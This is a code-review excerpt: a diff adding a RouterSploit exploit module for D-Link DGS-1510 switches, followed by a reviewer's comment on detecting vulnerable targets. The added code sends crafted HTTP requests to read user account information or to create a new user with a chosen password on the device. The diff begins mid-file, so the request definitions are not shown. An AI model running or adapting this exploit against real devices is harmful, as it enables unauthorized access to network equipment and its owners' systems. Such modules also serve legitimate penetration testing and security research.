routersploit/modules/exploits/dlink/dgs_1510_information_disclosure.py

```diff
@@ -0,0 +1,144 @@
+    }
+    target = exploits.Option('http://192.168.1.1', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    action = exploits.Option('user_info',
+                             'Information to retrieve like user information or adding new user. Valid actions {}.'.format(information_disclosure_actions.keys()),
+                             validators=validators.enum(information_disclosure_actions.keys()))
+    port = exploits.Option(80, 'Target port')  # default port
+    username = exploits.Option('dlinkuser', 'User to add in case that user_add option is used.')
+    password = exploits.Option('dlinkpwd1234', 'Password for user in case that user_add option is used.')
+    response_content = None
+
+    def decompress(self, content, encoding):
+        ret = content
+
+        if encoding == 'gzip':
+            ret = gzip.GzipFile(fileobj=StringIO(ret)).read()
+
+        elif encoding == 'deflate':
+            decompress = zlib.decompressobj(-zlib.MAX_WBITS)
+            inflated = decompress.decompress(ret)
+            inflated += decompress.flush()
+            ret = inflated
+
+        return ret.replace("\n", "")
+
+    def parse_print(self, content):
+
+        if self.action == "user_info":
+            m_groups = re.match(r'(.*) UserInfo = \[(.*)\];', content, re.I | re.M)
+
+            if m_groups and m_groups.groups > 2:
+                print_table(("User Info", ), (m_groups.group(2), ))
+            else:
+                # Print something, in case that formats vary over models
+                # maybe regex will not work and we don't want to leave
+                # users without information
+                print_table(("User Info", ), (content, ))
+
+        elif self.action == "user_add":
+            print_success("User {} with password {} created.".format(self.username, self.password))
+
+    def run(self):
+
+        if self.check():
+            print_success("Target appears to be vulnerable")
+            self.parse_print(self.response_content)
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        body = None
+        response = None
+
+        url = self.information_disclosure_actions[self.action]['url'].format(self.target, self.port)
+        headers = self.information_disclosure_actions[self.action]['headers']
+        headers['Referer'] = headers['Referer'].format(self.target, self.port)
+
+        if self.action == "user_add":
+            headers['Origin'] = headers['Origin'].format(self.target, self.port)
+            body = self.information_disclosure_actions[self.action]['body'].format(self.username, self.password)
+            response = http_request(method="POST", url=url, headers=headers, data=body)
+        elif self.action == "user_info":
+            response = http_request(method="GET", url=url, headers=headers)
+
+        if response is not None and response.status_code == 200:
```

Comment:
Yes, that might be too broad. There are a lot of routers that responds with 200 for all requests. I would suggest to try to identify if target is vulnerable by checking content that is returned by decompress method.